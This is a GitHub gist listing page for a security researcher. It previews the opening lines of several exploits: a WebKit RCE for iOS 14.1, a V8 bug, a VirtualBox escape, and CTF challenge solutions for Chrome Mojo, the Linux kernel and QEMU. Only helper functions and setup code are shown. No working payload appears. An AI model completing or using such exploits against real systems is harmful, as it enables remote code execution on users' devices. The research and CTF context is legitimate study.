Skip to content

Instantly share code, notes, and snippets.

Avatar
😸
writing happy exploits

Duc Phan ducphanduyagentp

😸
writing happy exploits
View GitHub Profile
@ducphanduyagentp
ducphanduyagentp / fuck.js
Created Sep 6, 2021 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
View fuck.js
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
View poolMetaData.json
{
"name": "MELD 1 TEST",
"description": "MELD 1 TEST POOL",
"ticker": "MELD1",
"homepage": "https://meld.com"
}
View chrome-v8-issue-1126249.js
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
View 3_years_of_attacking_javascript_engines.txt
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptional changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
View virtualbox_3d_exp.py
# Author : peternguyen93
import sys
sys.path.append('../') # back to vboxlib module
from vboxlib.hgcm import *
from vboxlib.chromium import *
from ctypes import *
'''
@ducphanduyagentp
ducphanduyagentp / exploit.html
Created Jun 24, 2019 — forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
View exploit.html
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
@ducphanduyagentp
ducphanduyagentp / exp.py
Created May 13, 2019 — forked from hama7230/exp.py
DEF CON CTF Qualifier 2019 speedrun-012
View exp.py
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./speedrun-012')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
@ducphanduyagentp
ducphanduyagentp / exploit.c
Created Feb 17, 2019 — forked from sampritipanda/exploit.c
Real World CTF - SCSI Driver Exploitation Challenge
View exploit.c
#include <stdint.h>
#include <sys/io.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
#include <assert.h>
#include "virt_to_phys.c"
@ducphanduyagentp
ducphanduyagentp / pwn.js
Created Jan 10, 2019 — forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
View pwn.js
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down do "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//
//
View keybase.md

Keybase proof

I hereby claim:

  • I am ducphanduyagentp on github.
  • I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
  • I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2

To claim this, I am signing this object: